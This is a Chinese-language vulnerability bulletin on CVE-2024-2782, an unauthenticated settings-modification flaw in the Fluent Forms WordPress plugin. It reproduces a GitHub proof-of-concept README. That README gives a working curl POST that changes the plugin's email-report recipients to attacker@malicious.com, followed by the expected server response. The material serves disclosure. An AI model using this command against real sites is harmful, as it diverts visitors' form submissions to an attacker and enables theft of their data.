Contact Form – Fluent Forms 未授权数据修改漏洞

漏洞信息

漏洞名称: Contact Form – Fluent Forms 未授权数据修改漏洞

漏洞编号:

  • CVE: CVE-2024-2782

漏洞类型: 未授权访问

漏洞等级: 高危

漏洞描述: Contact Form – Fluent Forms 是一款为WordPress设计的表单构建插件,支持创建联系表单、问卷调查和拖拽式表单构建,广泛应用于各类WordPress网站中。该插件在5.1.16及之前的所有版本中,存在一个未授权访问漏洞,攻击者可以通过/wp-json/fluentform/v1/global-settings REST API端点修改插件的所有设置,而无需任何认证。

漏洞的技术根源在于对/wp-json/fluentform/v1/global-settings REST API端点的访问控制缺失,未能对请求进行能力检查,导致未认证的攻击者可以发送恶意请求修改插件设置。这种设计缺陷使得攻击者能够利用简单的HTTP POST请求,无需任何用户交互或认证,即可实现对插件设置的未授权修改。

此漏洞的影响极为严重,攻击者可以利用此漏洞修改插件的电子邮件设置,将表单提交的数据重定向到攻击者控制的邮箱,从而导致敏感信息泄露。此外,攻击者还可能通过修改其他关键设置,破坏网站的正常功能或进一步利用其他漏洞。由于漏洞利用无需认证且可以自动化执行,所有运行受影响版本插件的WordPress网站都面临着高风险。

产品厂商: Fluent Forms

产品名称: Contact Form – Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder

影响版本: version <= 5.1.16

来源: https://github.com/whale93/CVE-2024-2782-PoC

类型: CVE-2024:github search

仓库文件

  • README.md

来源概述

CVE-2024-2782-PoC

CVE-2024-2782 Proof-of-Concept

The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin’s settings.

Prerequisites

  • WordPress site with Contact Form – Fluent Forms ≤ 5.1.16 active.
  • Attacker can reach the site’s REST API (no authentication needed).

Exploit Command

1
2
3
4
5
6
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
  -H "Content-Type: application/json"
  -d '{
  "key": "emailSummarySettings",
  "email_report": "{"send_to_type":"custom","custom_recipients":"attacker@malicious.com"}"
}'

Expected Response

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true

Screenshot
image

Verify changes in WordPress database
image

Github Poc
#未授权访问 #CVE-2024:github search
Contact Form – Fluent Forms 未授权数据修改漏洞
http://example.com/2025/08/03/github_3994850276/
作者
lianccc
发布于
2025年8月3日
许可协议